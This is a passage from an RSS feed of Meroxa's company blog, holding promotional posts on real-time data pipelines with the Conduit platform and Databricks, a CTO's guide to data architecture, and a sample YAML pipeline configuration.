&lt;/ul&gt;
&lt;h3&gt;2. &lt;strong&gt;In-Flight Transformations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With the Conduit Platform, you can enrich, filter, and transform data as it flows through the pipeline. These in-flight transformations ensure that only relevant, clean data reaches its destination.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Comparison:&lt;/strong&gt; Competitors often require scheduling batch ETL jobs, delaying data availability and introducing additional resource overhead.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Configuration file Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; file&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;to&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;file
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgres&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgresql&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//meroxauser&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;meroxapass@127.0.0.1&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;5432/meroxadb
          &lt;span class=&quot;token key atrule&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Users
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example.out
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;file
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ./users.txt
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; decode
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; json.decode &lt;span class=&quot;token comment&quot;&gt;# using a builtin processor provided by conduit.&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; .Payload.After&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;3. &lt;strong&gt;Scalable, Cloud-Native Architecture&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Conduit Platform’s distributed, cloud-native infrastructure is designed for high availability and fault tolerance. This makes it capable of processing large-scale, high-velocity data streams efficiently.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Example:&lt;/strong&gt; The Conduit Platform can handle continuous streams of IoT sensor data from millions of devices, adapting dynamically to spikes in data volume.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Metric Highlight:&lt;/strong&gt; With horizontal scaling, the Conduit Platform can process billions of events daily, reducing latency by up to 50% compared to batch systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;4. &lt;strong&gt;Real-Time Observability&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Conduit Platform provides built-in observability tools, giving data engineers and analysts real-time visibility into pipeline performance. Metrics, logs, and alerts are accessible via APIs and integrations with tools like Grafana and Prometheus.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Comparison:&lt;/strong&gt; Batch systems often rely on delayed or after-the-fact reporting, making real-time troubleshooting difficult.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feature Highlight:&lt;/strong&gt; Conduit’s data lineage tracking ensures transparency and simplifies compliance audits.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;5. &lt;strong&gt;Developer-Friendly Platform&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform simplifies pipeline development with intuitive APIs, CLI tools, and pre-configured connectors, reducing the complexity of setup and maintenance.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;User Perspective:&lt;/strong&gt; Data engineers can deploy a real-time pipeline in minutes, enabling faster time-to-value compared to traditional batch workflows that require extensive setup.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Real-World Use Cases for Real-Time Pipelines&lt;/h3&gt;
&lt;p&gt;Here’s how real-time pipelines, powered by Meroxa’s Conduit Platform, are transforming industries:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;E-Commerce:&lt;/strong&gt; Real-time processing of user behavior data to deliver instant product recommendations, increasing engagement and conversion rates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Finance:&lt;/strong&gt; Continuous monitoring of transactions to detect fraud in real-time, reducing financial losses and enhancing customer trust.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Healthcare:&lt;/strong&gt; Streaming IoT device data to monitor patient vitals and trigger timely interventions, improving outcomes and operational efficiency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Logistics:&lt;/strong&gt; Dynamic optimization of delivery routes using live traffic and weather data, reducing delays and operational costs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Why Real-Time Is the Future&lt;/h3&gt;
&lt;p&gt;As businesses become increasingly reliant on data to drive decisions, the shift from batch to real-time pipelines is inevitable. Real-time processing provides the agility, efficiency, and accuracy that modern organizations need to thrive in competitive markets. By choosing Meroxa’s Conduit Platform, data engineers, analysts, and businesses can unlock the full potential of real-time data—without the headaches of traditional batch systems.&lt;/p&gt;
&lt;h3&gt;Ready to Go Real-Time?&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform makes it simple to build and scale real-time data pipelines. Whether you’re starting from scratch or modernizing existing batch workflows, our platform has the tools you need to succeed.&lt;/p&gt;
&lt;p&gt;👉 &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;**Start your real-time journey today&lt;/a&gt; with Meroxa’s Conduit Platform.** Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time AI Made Simple: How Meroxa and Databricks Work Together]]></title><description><![CDATA[Whether you’re building recommendation engines, fraud detection systems, or dynamic pricing models, real-time data powers smarter and faster decisions. For Databricks users, the platform already excels at advanced analytics and AI. Pair it with Meroxa’s seamless, cost-effective real-time data ingestion and transformation capabilities to unlock the full potential of real-time AI workflows. Together, Meroxa and Databricks simplify complex streaming architectures, enabling accurate insights and faster business outcomes without the usual headaches or costs.]]></description><link>https://meroxa.com/blog/real-time-ai-made-simple-how-meroxa-and-databricks-work-together</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-ai-made-simple-how-meroxa-and-databricks-work-together</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 21 Jan 2025 10:59:00 GMT</pubDate><content:encoded>&lt;p&gt;In today’s fast-paced world, businesses are demanding faster and smarter insights from their data. Whether you’re building recommendation engines, real-time fraud detection systems, or dynamic pricing models, timely data can make the difference between staying ahead of the competition or falling behind.&lt;/p&gt;
&lt;p&gt;If you’re an existing Databricks user, you already know how powerful its platform can be for large-scale data processing, advanced analytics, and AI model training. But what if you could complement Databricks with an easy-to-use, cost-effective solution for real-time data ingestion and transformation? That’s where Meroxa comes in. Together, Meroxa and Databricks empower you to harness the power of real-time AI workflows—without the complexity and costs that usually come with streaming data.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;The Power of Real-Time AI&lt;/h2&gt;
&lt;p&gt;AI models are only as good as the data they’re trained on. Historically, many organizations relied on batch pipelines that ran daily or weekly, which meant that AI models were working off stale data. With real-time data, you can continuously feed the most up-to-date information into your AI pipelines—leading to more accurate predictions, faster responses to changing market conditions, and overall improved business outcomes.&lt;/p&gt;
&lt;p&gt;However, implementing real-time streaming can be challenging. It often requires specialized infrastructure to collect, process, and deliver streaming data at scale. That’s why we built Meroxa to abstract away that complexity. Our platform seamlessly integrates with Databricks so you can transform your streaming data into insights—at a fraction of the complexity and cost.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;How Meroxa and Databricks Work Together&lt;/h2&gt;
&lt;p&gt;Meroxa is designed to handle data ingestion and transformation in real-time. Databricks excels at large-scale data processing, model building, and inference. Here’s a high-level look at how data flows between the two:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/databricks-flow.png&quot; alt=&quot;databricks-flow.png&quot;&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Data Ingestion&lt;/strong&gt;: Meroxa connects to various data sources—ranging from databases and APIs to IoT devices—to ingest streaming data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Transformation&lt;/strong&gt;: Meroxa processes and enriches the data in-flight, ensuring it’s clean, well-structured, and ready for analysis.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Lake&lt;/strong&gt;: The transformed data is delivered to Databricks (Delta Lake), where it can be immediately leveraged for analytics or AI workflows.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Model Building and Inference&lt;/strong&gt;: Using Databricks’ powerful notebooks and Spark-based infrastructure, data scientists train and deploy AI models.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Predictions&lt;/strong&gt;: The resulting insights or predictions can be pushed back into downstream applications, dashboards, or other systems for immediate action.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h2&gt;Pros and Cons of Real-Time Streaming with Databricks&lt;/h2&gt;
&lt;h3&gt;Customer Value&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Real-time data enables immediate insights, allowing you to enhance customer experiences, reduce fraud, or refine recommendations on the fly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cons&lt;/strong&gt;: A real-time approach requires more diligence around data quality and governance to ensure accurate results.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Performance&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Databricks, with its scalable compute engine, can handle massive throughput, making it suitable for high-velocity data streams.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cons&lt;/strong&gt;: If not configured properly, streaming workloads can become resource-intensive.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Complexity&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Databricks notebooks provide a familiar environment for data engineers and data scientists. Meroxa’s automation reduces the complexity of managing multiple real-time data pipelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cons&lt;/strong&gt;: Setting up and managing a streaming architecture from scratch is traditionally complex. However, Meroxa alleviates much of that burden by providing managed, easy-to-configure connectors and transformations.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Compute Cost&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Streaming can lower the cost of data processing by reducing reliance on batch windows and large, one-time compute spikes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cons&lt;/strong&gt;: Always-on streaming clusters can drive up compute costs if not carefully orchestrated. By offloading real-time ingestion and transformations to Meroxa, you only pay for what you use, helping manage costs more effectively.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Meroxa: Real-Time AI Without the Headaches&lt;/h2&gt;
&lt;p&gt;Implementing real-time data streams shouldn’t be overwhelming—or expensive. Meroxa’s fully-managed platform abstracts away much of the complexity involved in ingesting, processing, and routing streaming data. Our ready-to-use connectors, real-time transformations, and intuitive UI make it easy to onboard new data sources and pipelines—no need to spin up additional infrastructure or juggle multiple services.&lt;/p&gt;
&lt;p&gt;Meanwhile, Databricks handles what it does best: large-scale data processing, advanced analytics, and AI model development. Together, Meroxa and Databricks form a powerful combination that yields more accurate AI models, quicker time-to-insight, and significantly lower operational overhead.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Call to Action&lt;/h2&gt;
&lt;p&gt;Ready to unlock the potential of real-time AI? Start by using &lt;strong&gt;Meroxa&lt;/strong&gt; for your data ingestion and transformation needs. Then, harness the power of &lt;strong&gt;Databricks&lt;/strong&gt; for model building and inference. With Meroxa taking care of real-time data and Databricks focusing on advanced analytics and AI, you can drive powerful new insights—faster and more affordably than ever.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Get started today&lt;/a&gt;&lt;/strong&gt; and see how Meroxa + Databricks can help you streamline your data pipelines, reduce operational complexity, and take your AI initiatives to the next level.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building a Future-Proof Data Architecture: A CTO’s Guide]]></title><description><![CDATA[Discover how CTOs can tackle fragmented data, scalability, compliance, and vendor lock-in challenges. This blog highlights how Meroxa’s Conduit Platform enables real-time data integration, optimized costs, and innovation-ready architectures to future-proof your enterprise.]]></description><link>https://meroxa.com/blog/building-a-future-proof-data-architecture-a-ctos-guide</link><guid isPermaLink="false">https://meroxa.com/blog/building-a-future-proof-data-architecture-a-ctos-guide</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 16 Jan 2025 11:06:00 GMT</pubDate><content:encoded>&lt;p&gt;As a CTO in 2025, you&apos;re facing a perfect storm of data challenges. Your board is asking about AI strategy, your teams are drowning in data silos, and everyone wants real-time insights yesterday. Meanwhile, you&apos;re trying to balance innovation with stability, cost with capability, and speed with security.&lt;/p&gt;
&lt;p&gt;Let&apos;s cut through the noise and talk about what really matters in building a data architecture that won&apos;t be obsolete by the time you finish implementing it.&lt;/p&gt;
&lt;h2&gt;The Shifting Landscape&lt;/h2&gt;
&lt;p&gt;Remember when data architecture was simpler? When batch processing was enough, when &quot;real-time&quot; meant daily updates, and when AI was something you&apos;d read about in research papers? Those days are gone, and they&apos;re not coming back.&lt;/p&gt;
&lt;p&gt;Today&apos;s landscape demands architectures that can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Process data in genuine real-time (not &quot;near&quot; real-time)&lt;/li&gt;
&lt;li&gt;Support AI/ML workflows natively&lt;/li&gt;
&lt;li&gt;Scale elastically without breaking the bank&lt;/li&gt;
&lt;li&gt;Adapt to new data sources and types without requiring rebuilds&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And tomorrow? The demands will only increase.&lt;/p&gt;
&lt;h2&gt;The Three Pillars of Future-Proof Architecture&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dalle-2025-01-15-20.50.48-3-pillars.png&quot; alt=&quot;DALLE - 2025-01-15-20.50.48-3-pillars.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;After working with hundreds of CTOs and enterprise architects, we&apos;ve identified three core principles that separate architectures that scale and adapt from those that become tomorrow&apos;s technical debt.&lt;/p&gt;
&lt;h3&gt;1. Real-Time First, Not Real-Time Later&lt;/h3&gt;
&lt;p&gt;Here&apos;s an uncomfortable truth: if you&apos;re not building for real-time data now, you&apos;re already behind. The &quot;we&apos;ll add real-time later&quot; approach is the technical equivalent of planning to dig a basement after building your house.&lt;/p&gt;
&lt;p&gt;Real-time isn&apos;t just about speed – it&apos;s about architectural flexibility. When your foundation supports real-time data flows, batch processing becomes just a special case of your real-time capabilities, not the other way around.&lt;/p&gt;
&lt;p&gt;What this means in practice:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Change Data Capture (CDC) should be your default approach, not an afterthought&lt;/li&gt;
&lt;li&gt;Your data pipeline should handle streaming data natively&lt;/li&gt;
&lt;li&gt;Event-driven architectures should be your foundation, not an add-on&lt;/li&gt;
&lt;li&gt;Latency should be measured in milliseconds, not minutes&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;2. Decoupled by Design&lt;/h3&gt;
&lt;p&gt;The most future-proof architectures are those that allow components to evolve independently. Think LEGO blocks, not concrete monuments.&lt;/p&gt;
&lt;p&gt;This means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Embracing event-driven architectures that naturally decouple producers from consumers&lt;/li&gt;
&lt;li&gt;Using standardized data contracts between systems&lt;/li&gt;
&lt;li&gt;Implementing async workflows by default&lt;/li&gt;
&lt;li&gt;Treating data platforms as products, not projects&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The goal isn&apos;t just flexibility – it&apos;s survival. When (not if) you need to swap out components or add new capabilities, a decoupled architecture lets you evolve without revolution.&lt;/p&gt;
&lt;h3&gt;3. Data as a Product, Not a Byproduct&lt;/h3&gt;
&lt;p&gt;Stop treating data as something that just happens. In a future-proof architecture, data is a first-class product with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Clear ownership and governance&lt;/li&gt;
&lt;li&gt;Defined SLAs and quality metrics&lt;/li&gt;
&lt;li&gt;Versioning and lifecycle management&lt;/li&gt;
&lt;li&gt;Self-service access with proper controls&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This shift in mindset changes everything from how you structure teams to how you build pipelines.&lt;/p&gt;
&lt;h2&gt;The Technical Stack That Makes It Possible&lt;/h2&gt;
&lt;p&gt;Let&apos;s examine how data architectures need to evolve to meet future demands. First, let&apos;s look at what many organizations have today versus where they need to go.&lt;/p&gt;
&lt;h3&gt;Traditional Architecture: The Legacy Approach&lt;/h3&gt;
&lt;p&gt;In traditional data architectures, we typically see:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Batch ETL Processing
&lt;ul&gt;
&lt;li&gt;Scheduled jobs pulling data from source systems&lt;/li&gt;
&lt;li&gt;Complex ETL tools managing transformations&lt;/li&gt;
&lt;li&gt;Heavy reliance on data warehouses&lt;/li&gt;
&lt;li&gt;Delayed insights and high latency&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Siloed ML Operations
&lt;ul&gt;
&lt;li&gt;Separate pipelines for ML training&lt;/li&gt;
&lt;li&gt;Batch-oriented feature engineering&lt;/li&gt;
&lt;li&gt;Limited real-time inference capabilities&lt;/li&gt;
&lt;li&gt;Disconnected model serving&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Limited Real-time Capabilities
&lt;ul&gt;
&lt;li&gt;&quot;Near real-time&quot; through micro-batching&lt;/li&gt;
&lt;li&gt;Multiple data copies across systems&lt;/li&gt;
&lt;li&gt;Point-to-point integrations&lt;/li&gt;
&lt;li&gt;High maintenance overhead&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-24-132854.png&quot; alt=&quot;mermaid-diagram-2025-01-24-132854.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Future-Proof Architecture: The Modern Approach&lt;/h3&gt;
&lt;p&gt;The future-proof architecture fundamentally shifts how data flows through your organization:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The Foundation Layer
&lt;ul&gt;
&lt;li&gt;CDC captures changes instantly from source systems&lt;/li&gt;
&lt;li&gt;Event streaming backbone (like Kafka) provides real-time data highways&lt;/li&gt;
&lt;li&gt;Unified processing engine handles both streaming and batch&lt;/li&gt;
&lt;li&gt;Everything is real-time first, batch when needed&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Processing Layer
&lt;ul&gt;
&lt;li&gt;Stream processing enables instant transformations&lt;/li&gt;
&lt;li&gt;SQL and programmatic transformations coexist&lt;/li&gt;
&lt;li&gt;ML models serve and train on live data&lt;/li&gt;
&lt;li&gt;Automatic scaling based on actual load&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Serving Layer
&lt;ul&gt;
&lt;li&gt;Multiple serving patterns (real-time, batch, hybrid)&lt;/li&gt;
&lt;li&gt;Flexible consumption patterns (push, pull, subscribe)&lt;/li&gt;
&lt;li&gt;Universal data format support&lt;/li&gt;
&lt;li&gt;Granular controls and monitoring&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-24-132639.png&quot; alt=&quot;mermaid-diagram-2025-01-24-132639.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Key Architectural Differences&lt;/h3&gt;
&lt;p&gt;The shift from traditional to future-proof architecture brings several critical improvements:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Data Freshness
&lt;ul&gt;
&lt;li&gt;Traditional: Hours or days old&lt;/li&gt;
&lt;li&gt;Future-proof: Real-time or near-instantaneous&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Scaling Approach
&lt;ul&gt;
&lt;li&gt;Traditional: Vertical scaling with fixed resources&lt;/li&gt;
&lt;li&gt;Future-proof: Horizontal scaling with elastic resources&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Integration Pattern
&lt;ul&gt;
&lt;li&gt;Traditional: Point-to-point connections&lt;/li&gt;
&lt;li&gt;Future-proof: Event-driven backbone&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;ML/AI Support
&lt;ul&gt;
&lt;li&gt;Traditional: Separate batch pipelines&lt;/li&gt;
&lt;li&gt;Future-proof: Integrated real-time feature engineering&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Implementation Using Meroxa&lt;/h3&gt;
&lt;p&gt;Here&apos;s how Meroxa implements these architectural principles:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Source Integration
&lt;ul&gt;
&lt;li&gt;Native CDC connectors for all major databases&lt;/li&gt;
&lt;li&gt;Zero-impact change capture&lt;/li&gt;
&lt;li&gt;Automatic schema evolution handling&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Real-time Processing
&lt;ul&gt;
&lt;li&gt;Instant data transformations&lt;/li&gt;
&lt;li&gt;Built-in stream processing&lt;/li&gt;
&lt;li&gt;Scalable event routing&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Destination Support
&lt;ul&gt;
&lt;li&gt;Multiple output formats and protocols&lt;/li&gt;
&lt;li&gt;Real-time API endpoints&lt;/li&gt;
&lt;li&gt;Flexible consumption patterns&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Making It Real: The Implementation Roadmap&lt;/h2&gt;
&lt;p&gt;Here&apos;s how to move from theory to practice:&lt;/p&gt;
&lt;h3&gt;Phase 1: Foundation Setting (3-6 months)&lt;/h3&gt;
&lt;p&gt;Start with a single high-value data flow:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Implement CDC on your most critical data sources&lt;/li&gt;
&lt;li&gt;Set up your real-time streaming backbone&lt;/li&gt;
&lt;li&gt;Build your first real-time pipelines&lt;/li&gt;
&lt;li&gt;Establish monitoring and observability&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Phase 2: Scaling Out (6-12 months)&lt;/h3&gt;
&lt;p&gt;Expand your real-time capabilities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Add more data sources and types&lt;/li&gt;
&lt;li&gt;Implement self-service capabilities&lt;/li&gt;
&lt;li&gt;Build out your data product framework&lt;/li&gt;
&lt;li&gt;Establish governance patterns&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Phase 3: Innovation Enablement (Ongoing)&lt;/h3&gt;
&lt;p&gt;Now you can focus on value creation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Enable ML/AI workflows&lt;/li&gt;
&lt;li&gt;Implement advanced analytics&lt;/li&gt;
&lt;li&gt;Build real-time features&lt;/li&gt;
&lt;li&gt;Enable new business capabilities&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Role of Modern Platforms&lt;/h2&gt;
&lt;p&gt;This is where platforms like Meroxa come in. We&apos;re not just another tool in your stack – we&apos;re the foundation that makes this architecture possible without requiring an army of specialists.&lt;/p&gt;
&lt;p&gt;With Meroxa, you get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Native CDC capabilities that just work&lt;/li&gt;
&lt;li&gt;Real-time processing without the complexity&lt;/li&gt;
&lt;li&gt;Built-in governance and monitoring&lt;/li&gt;
&lt;li&gt;Enterprise-grade security and reliability&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Cost of Waiting&lt;/h2&gt;
&lt;p&gt;Every day you delay moving to a real-time, future-proof architecture is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Another day of accumulated technical debt&lt;/li&gt;
&lt;li&gt;Another missed opportunity for real-time insights&lt;/li&gt;
&lt;li&gt;Another competitor potentially pulling ahead&lt;/li&gt;
&lt;li&gt;Another AI use case you can&apos;t support&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Your Next Steps&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Assess your current architecture&apos;s real-time capabilities&lt;/li&gt;
&lt;li&gt;Identify your highest-value real-time use cases&lt;/li&gt;
&lt;li&gt;Start small but think big – pick a pilot project&lt;/li&gt;
&lt;li&gt;Partner with platforms that support your vision&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Looking Ahead&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dalle-2025-01-15-20.59.39-a-visionary-illustration-representing-the-future-of-data-architecture.png&quot; alt=&quot;DALLE - 2025-01-15-20.59.39-a-visionary-illustration-representing-the-future-of-data-architecture.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;The future of data architecture isn&apos;t about bigger batch jobs or more complex ETL pipelines. It&apos;s about real-time, adaptable, and intelligent systems that can evolve as your needs change.&lt;/p&gt;
&lt;p&gt;The question isn&apos;t whether to make this shift – it&apos;s how quickly you can make it happen.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;Ready to future-proof your data architecture? Let&apos;s talk about how Meroxa can help you build a foundation for real-time success. &lt;a href=&quot;https://meroxa.com/demo&quot;&gt;Schedule a conversation&lt;/a&gt; with our solutions architects today.&lt;/em&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building Your First Real-Time Pipeline with Meroxa's Conduit OSS: A Step-by-Step Guide]]></title><description><![CDATA[This blog provides a comprehensive, beginner-friendly guide to building your first real-time data pipeline using Meroxa’s open-source Conduit platform. Designed to simplify real-time data integration, Conduit empowers developers to move data seamlessly between systems with minimal setup. The guide walks readers through the installation, initialization, pipeline configuration, and execution steps. Starting with a sample pipeline that streams generated data to a destination file, it showcases Conduit’s intuitive configuration process and highlights 